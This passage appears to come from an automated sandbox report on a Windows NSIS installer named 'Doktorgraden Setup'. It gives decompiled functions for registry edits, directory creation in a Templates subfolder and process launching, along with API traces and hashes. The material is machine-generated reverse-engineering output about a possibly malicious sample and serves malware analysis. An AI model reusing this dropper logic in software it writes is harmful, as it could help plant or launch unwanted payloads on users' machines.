                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402421
                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040245E
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseValuelstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nse224D.tmp
                                                      • API String ID: 2655323295-2797120381
                                                      • Opcode ID: a255093a8ed6f72dffe291aa6522cbdc2aa9f68222cbeac447eaed5d135dc8b8
                                                      • Instruction ID: b9f9fe5e010ce9562f7769f0650a0fc1c691aa098229d6fee64222e6c9067592
                                                      • Opcode Fuzzy Hash: a255093a8ed6f72dffe291aa6522cbdc2aa9f68222cbeac447eaed5d135dc8b8
                                                      • Instruction Fuzzy Hash: 29119371E00215BEDB10EFA5DE49EAEBA74EB54318F20843BF504F71D1C6B94D419B28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E00405A03(void* __eflags, intOrPtr _a4) {
                                                      				int _t11;
                                                      				signed char* _t12;
                                                      				long _t16;
                                                      				intOrPtr _t18;
                                                      				intOrPtr* _t21;
                                                      				void* _t22;
                                                      
                                                      				E00405F7D(0x7a0948, _a4);
                                                      				_t21 = E004059AE(0x7a0948);
                                                      				if(_t21 != 0) {
                                                      					E004061E7(_t21);
                                                      					if(( *0x7a2f5c & 0x00000080) == 0) {
                                                      						L5:
                                                      						_t22 = _t21 - 0x7a0948;
                                                      						while(1) {
                                                      							_t11 = lstrlenA(0x7a0948);
                                                      							_push(0x7a0948);
                                                      							if(_t11 <= _t22) {
                                                      								break;
                                                      							}
                                                      							_t12 = E00406280();
                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                      								E0040595C(0x7a0948);
                                                      								continue;
                                                      							} else {
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      						E00405915();
                                                      						_t16 = GetFileAttributesA(??); // executed
                                                      						return 0 | _t16 != 0xffffffff;
                                                      					}
                                                      					_t18 =  *_t21;
                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                      						goto L1;
                                                      					} else {
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				return 0;
                                                      			}










                                                      APIs
                                                        • Part of subcall function 00405F7D: lstrcpynA.KERNEL32(?,?,00000400,004032BB,Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F8A
                                                        • Part of subcall function 004059AE: CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059C1
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059D5
                                                      • lstrlenA.KERNEL32(Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A56
                                                      • GetFileAttributesA.KERNELBASE(Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,Forgngeliges.rea,00000000,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\), ref: 00405A66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$Forgngeliges.rea
                                                      • API String ID: 3248276644-2670542743
                                                      • Opcode ID: 59c4d439f8e780665a95aab8c0f078ab1494ed1c34d0f7562e7ab92a144acefd
                                                      • Instruction ID: 99d34a1d2256cfbc911754f26576654ac704e19cee30922b90174233901e1ae6
                                                      • Opcode Fuzzy Hash: 59c4d439f8e780665a95aab8c0f078ab1494ed1c34d0f7562e7ab92a144acefd
                                                      • Instruction Fuzzy Hash: 48F0A431315D5156C622323A1C4AAAF0A48CEC7364749463BF861B12D3DA3C89439D6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E00402BCD(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                      				void* _v8;
                                                      				char _v272;
                                                      				void* _t19;
                                                      				signed int _t25;
                                                      				intOrPtr* _t27;
                                                      				signed int _t32;
                                                      				signed int _t33;
                                                      				signed int _t34;
                                                      
                                                      				_t33 = _a12;
                                                      				_t34 = _t33 & 0x00000300;
                                                      				_t32 = _t33 & 0x00000001;
                                                      				_t19 = E00405E03(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8); // executed
                                                      				if(_t19 == 0) {
                                                      					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                      						__eflags = _t32;
                                                      						if(__eflags != 0) {
                                                      							RegCloseKey(_v8);
                                                      							return 0x3eb;
                                                      						}
                                                      						_t25 = E00402BCD(__eflags, _v8,  &_v272, _a12);
                                                      						__eflags = _t25;
                                                      						if(_t25 != 0) {
                                                      							break;
                                                      						}
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      					_t27 = E00406315(3);
                                                      					if(_t27 == 0) {
                                                      						return RegDeleteKeyA(_a4, _a8);
                                                      					}
                                                      					return  *_t27(_a4, _a8, _t34, 0);
                                                      				}
                                                      				return _t19;
                                                      			}












                                                      APIs
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Close$Enum
                                                      • String ID:
                                                      • API String ID: 464197530-0
                                                      • Opcode ID: e80e024fca40de8deb0b9c297206eede72932d1e756bb36d88eb62ad8731df9a
                                                      • Instruction ID: c4db57b0a2e4c89af525aedefa8ad358439d5fabd543c2a0248dd752bef9be78
                                                      • Opcode Fuzzy Hash: e80e024fca40de8deb0b9c297206eede72932d1e756bb36d88eb62ad8731df9a
                                                      • Instruction Fuzzy Hash: 16115832504109FBEF129F90CF09F9E7B69AB48390F104032BD45B51E0EBB59E11AAA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E004015BB(char __ebx, void* __eflags) {
                                                      				void* _t13;
                                                      				int _t19;
                                                      				char _t21;
                                                      				void* _t22;
                                                      				char _t23;
                                                      				signed char _t24;
                                                      				char _t26;
                                                      				CHAR* _t28;
                                                      				char* _t32;
                                                      				void* _t33;
                                                      
                                                      				_t26 = __ebx;
                                                      				_t28 = E00402ACB(0xfffffff0);
                                                      				_t13 = E004059AE(_t28);
                                                      				_t30 = _t13;
                                                      				if(_t13 != __ebx) {
                                                      					do {
                                                      						_t32 = E00405940(_t30, 0x5c);
                                                      						_t21 =  *_t32;
                                                      						 *_t32 = _t26;
                                                      						 *((char*)(_t33 + 0xb)) = _t21;
                                                      						if(_t21 != _t26) {
                                                      							L5:
                                                      							_t22 = E004055E7(_t28);
                                                      						} else {
                                                      							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                      							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405604(_t39) == 0) {
                                                      								goto L5;
                                                      							} else {
                                                      								_t22 = E0040556A(_t28); // executed
                                                      							}
                                                      						}
                                                      						if(_t22 != _t26) {
                                                      							if(_t22 != 0xb7) {
                                                      								L9:
                                                      								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                      							} else {
                                                      								_t24 = GetFileAttributesA(_t28); // executed
                                                      								if((_t24 & 0x00000010) == 0) {
                                                      									goto L9;
                                                      								}
                                                      							}
                                                      						}
                                                      						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                      						 *_t32 = _t23;
                                                      						_t30 = _t32 + 1;
                                                      					} while (_t23 != _t26);
                                                      				}
                                                      				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                      					_push(0xfffffff5);
                                                      					E00401423();
                                                      				} else {
                                                      					E00401423(0xffffffe6);
                                                      					E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t28);
                                                      					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                      					if(_t19 == 0) {
                                                      						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                      					}
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t33 - 4));
                                                      				return 0;
                                                      			}














                                                      APIs
                                                        • Part of subcall function 004059AE: CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059C1
                                                        • Part of subcall function 004059AE: CharNextA.USER32(00000000), ref: 004059D5
                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                        • Part of subcall function 0040556A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055AD
                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,00000000,00000000,000000F0), ref: 0040163C
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize, xrefs: 00401631
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize
                                                      • API String ID: 1892508949-2284297545
                                                      • Opcode ID: 896e4d0df2f5b7ce095f594a292d37cd624813725e5696a67fb6371ddee0b282
                                                      • Instruction ID: e2f0057a106d67730eaa6cdd0667b4b20a1f2aaf6f6dd3ced09863daba4193e1
                                                      • Opcode Fuzzy Hash: 896e4d0df2f5b7ce095f594a292d37cd624813725e5696a67fb6371ddee0b282
                                                      • Instruction Fuzzy Hash: 5C112B31104151EBCF217BB54D418BF66B09E92324B28053FE5D1B22E3D63D4D42963F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E00405E64(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                      				int _v8;
                                                      				long _t21;
                                                      				long _t24;
                                                      				char* _t30;
                                                      
                                                      				asm("sbb eax, eax");
                                                      				_v8 = 0x400;
                                                      				_t21 = E00405E03(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                      				_t30 = _a16;
                                                      				if(_t21 != 0) {
                                                      					L4:
                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                      				} else {
                                                      					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                      					_t21 = RegCloseKey(_a20); // executed
                                                      					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                      						goto L4;
                                                      					}
                                                      				}
                                                      				return _t21;
                                                      			}








                                                      APIs
                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,004060A8,80000002), ref: 00405EAA
                                                      • RegCloseKey.KERNELBASE(?,?,004060A8,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll), ref: 00405EB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3356406503-1824292864
                                                      • Opcode ID: 2ae01f244120d487d9f351ea12627f7621f1ac4d10347c017b688b21594c6fc7
                                                      • Instruction ID: be592471178a3b34147732ee01c8456e78db25e2de640fde20402d2d05791b9a
                                                      • Opcode Fuzzy Hash: 2ae01f244120d487d9f351ea12627f7621f1ac4d10347c017b688b21594c6fc7
                                                      • Instruction Fuzzy Hash: 88015A76500609AADF228F61CD09FDB3BA8EF59364F10442AF955A2190D378DA54CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040561C(CHAR* _a4) {
                                                      				struct _PROCESS_INFORMATION _v20;
                                                      				int _t7;
                                                      
                                                      				0x7a0d48->cb = 0x44;
                                                      				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a0d48,  &_v20); // executed
                                                      				if(_t7 != 0) {
                                                      					CloseHandle(_v20.hThread);
                                                      					return _v20.hProcess;
                                                      				}
                                                      				return _t7;
                                                      			}






                                                      APIs
                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D48,Error launching installer), ref: 00405645
                                                      • CloseHandle.KERNEL32(?), ref: 00405652
                                                      Strings
                                                      • Error launching installer, xrefs: 0040562F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 70af5941f3bc690bdcd9881a93690d3303993229d12fc254cd5844f1ea8daab6
                                                      • Instruction ID: bdfa79d73584ee4add39219e15a001359f74b35d93969b7cce68af7ca5274bde
                                                      • Opcode Fuzzy Hash: 70af5941f3bc690bdcd9881a93690d3303993229d12fc254cd5844f1ea8daab6
                                                      • Instruction Fuzzy Hash: 7AE04FF1600209BFEB009FA0DD05F7F77ACEB50744F004821BD14F6150D675A8008A78
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004024E5(int* __ebx, intOrPtr __edx, char* __esi) {
                                                      				void* _t9;
                                                      				int _t10;
                                                      				long _t13;
                                                      				int* _t16;
                                                      				intOrPtr _t21;
                                                      				void* _t22;
                                                      				char* _t24;
                                                      				void* _t26;
                                                      				void* _t29;
                                                      
                                                      				_t24 = __esi;
                                                      				_t21 = __edx;
                                                      				_t16 = __ebx;
                                                      				_t9 = E00402B0B(_t29, 0x20019); // executed
                                                      				_t22 = _t9;
                                                      				_t10 = E00402AA9(3);
                                                      				 *((intOrPtr*)(_t26 - 0x3c)) = _t21;
                                                      				 *__esi = __ebx;
                                                      				if(_t22 == __ebx) {
                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                      				} else {
                                                      					 *(_t26 + 8) = 0x3ff;
                                                      					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                      						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                      						__eflags = _t13;
                                                      						if(_t13 != 0) {
                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                      						}
                                                      					} else {
                                                      						RegEnumKeyA(_t22, _t10, __esi, 0x3ff); // executed
                                                      					}
                                                      					_t24[0x3ff] = _t16;
                                                      					_push(_t22); // executed
                                                      					RegCloseKey(); // executed
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t26 - 4));
                                                      				return 0;
                                                      			}












                                                      APIs
                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                                                      • RegEnumValueA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040252A
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseValue
                                                      • String ID:
                                                      • API String ID: 397863658-0
                                                      • Opcode ID: 0f199fac73fa034a888c8f233137f05f5704bcb160ec432268ac7fbc93c17938
                                                      • Instruction ID: 518d0c9c0f1d18e9ba130a50ca70a4c0b748d884a109ef79be1f353746569a5a
                                                      • Opcode Fuzzy Hash: 0f199fac73fa034a888c8f233137f05f5704bcb160ec432268ac7fbc93c17938
                                                      • Instruction Fuzzy Hash: 000171B1A04205FFEB159FA99E9CEBF7A7CDF40348F10443EF145A61C0DAB84A459729
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E00402473(int* __ebx, char* __esi) {
                                                      				void* _t17;
                                                      				char* _t18;
                                                      				void* _t33;
                                                      				void* _t37;
                                                      				void* _t40;
                                                      
                                                      				_t35 = __esi;
                                                      				_t27 = __ebx;
                                                      				_t17 = E00402B0B(_t40, 0x20019); // executed
                                                      				_t33 = _t17;
                                                      				_t18 = E00402ACB(0x33);
                                                      				 *__esi = __ebx;
                                                      				if(_t33 == __ebx) {
                                                      					 *(_t37 - 4) = 1;
                                                      				} else {
                                                      					 *(_t37 - 0x3c) = 0x400;
                                                      					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c) != 0) {
                                                      						L7:
                                                      						 *_t35 = _t27;
                                                      						 *(_t37 - 4) = 1;
                                                      					} else {
                                                      						if( *(_t37 + 8) == 4) {
                                                      							__eflags =  *(_t37 - 0x18) - __ebx;
                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                      							E00405EDB(__esi,  *__esi);
                                                      						} else {
                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                      								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                      								_t35[0x3ff] = _t27;
                                                      							} else {
                                                      								goto L7;
                                                      							}
                                                      						}
                                                      					}
                                                      					_push(_t33); // executed
                                                      					RegCloseKey(); // executed
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *(_t37 - 4);
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID:
                                                      • API String ID: 3356406503-0
                                                      • Opcode ID: ae4e2f35e0593205c837675dd62997ba6f7ed3afc724381fc97bb922e5473043
                                                      • Instruction ID: 16843ebe9de4b10a0f02fc33a3446f9eb73abb2b3234f807e7777e2680f676dd
                                                      • Opcode Fuzzy Hash: ae4e2f35e0593205c837675dd62997ba6f7ed3afc724381fc97bb922e5473043
                                                      • Instruction Fuzzy Hash: BF11E371A01205FEDF15CF64DA989AEBBB49F00348F20843FE445B72C0D6B84A81DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E00401389(signed int _a4) {
                                                      				intOrPtr* _t6;
                                                      				void* _t8;
                                                      				void* _t10;
                                                      				signed int _t11;
                                                      				void* _t12;
                                                      				intOrPtr _t15;
                                                      				signed int _t16;
                                                      				signed int _t17;
                                                      				void* _t18;
                                                      
                                                      				_t17 = _a4;
                                                      				while(_t17 >= 0) {
                                                      					_t15 =  *0x7a2f90; // 0xae681c
                                                      					_t6 = _t17 * 0x1c + _t15;
                                                      					if( *_t6 == 1) {
                                                      						break;
                                                      					}
                                                      					_push(_t6); // executed
                                                      					_t8 = E00401434(); // executed
                                                      					if(_t8 == 0x7fffffff) {
                                                      						return 0x7fffffff;
                                                      					}
                                                      					_t10 = E0040136D(_t8);
                                                      					if(_t10 != 0) {
                                                      						_t11 = _t10 - 1;
                                                      						_t16 = _t17;
                                                      						_t17 = _t11;
                                                      						_t12 = _t11 - _t16;
                                                      					} else {
                                                      						_t12 = _t10 + 1;
                                                      						_t17 = _t17 + 1;
                                                      					}
                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                      						 *0x7a272c =  *0x7a272c + _t12;
                                                      						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7a272c, 0x7530,  *0x7a2714), 0); // executed
                                                      					}
                                                      				}
                                                      				return 0;
                                                      			}












                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: f1e14ae547b8f36b78d572cd64f3e527c113299c5085ae7931b2eb67e5d22d6e
                                                      • Instruction ID: b093ac6dabfd3bf5cd98619b9c3e878c543c382afaa1261ab96434968757bf0e
                                                      • Opcode Fuzzy Hash: f1e14ae547b8f36b78d572cd64f3e527c113299c5085ae7931b2eb67e5d22d6e
                                                      • Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B6A36A8E751354F10813FF955F65F2D678CC028B4C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402381(void* __ebx, void* __edx) {
                                                      				long _t6;
                                                      				void* _t9;
                                                      				void* _t13;
                                                      				long _t18;
                                                      				void* _t20;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      
                                                      				_t13 = __ebx;
                                                      				_t26 =  *(_t23 - 0x18) - __ebx;
                                                      				_t20 = __edx;
                                                      				if( *(_t23 - 0x18) != __ebx) {
                                                      					_t6 = E00402B89(_t20, E00402ACB(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                      					_t18 = _t6;
                                                      					goto L4;
                                                      				} else {
                                                      					_t9 = E00402B0B(_t26, 2); // executed
                                                      					_t22 = _t9;
                                                      					if(_t22 == __ebx) {
                                                      						L6:
                                                      						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                      					} else {
                                                      						_t18 = RegDeleteValueA(_t22, E00402ACB(0x33));
                                                      						RegCloseKey(_t22);
                                                      						L4:
                                                      						if(_t18 != _t13) {
                                                      							goto L6;
                                                      						}
                                                      					}
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t23 - 4));
                                                      				return 0;
                                                      			}










                                                      APIs
                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023A2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue
                                                      • String ID:
                                                      • API String ID: 2831762973-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040156F(void* __ebx, int __edx) {
                                                      				int _t3;
                                                      				void* _t8;
                                                      				struct HWND__* _t10;
                                                      				struct HWND__* _t11;
                                                      				void* _t16;
                                                      
                                                      				_t8 = __ebx;
                                                      				_t10 =  *0x7a2710; // 0x10414
                                                      				if(_t10 != __ebx) {
                                                      					ShowWindow(_t10, __edx); // executed
                                                      					_t3 =  *(_t16 - 0x28);
                                                      				}
                                                      				_t11 =  *0x7a2724; // 0x1040e
                                                      				if(_t11 != _t8) {
                                                      					ShowWindow(_t11, _t3); // executed
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t16 - 4));
                                                      				return 0;
                                                      			}









                                                      APIs
                                                      • ShowWindow.USER32(00010414), ref: 00401581
                                                      • ShowWindow.USER32(0001040E), ref: 00401596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00406315(signed int _a4) {
                                                      				struct HINSTANCE__* _t5;
                                                      				signed int _t10;
                                                      
                                                      				_t10 = _a4 << 3;
                                                      				_t8 =  *(_t10 + 0x40a240);
                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                      				if(_t5 != 0) {
                                                      					L2:
                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                      				}
                                                      				_t5 = E004062A7(_t8); // executed
                                                      				if(_t5 == 0) {
                                                      					return 0;
                                                      				}
                                                      				goto L2;
                                                      			}






                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                        • Part of subcall function 004062A7: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062BE
                                                        • Part of subcall function 004062A7: wsprintfA.USER32 ref: 004062F7
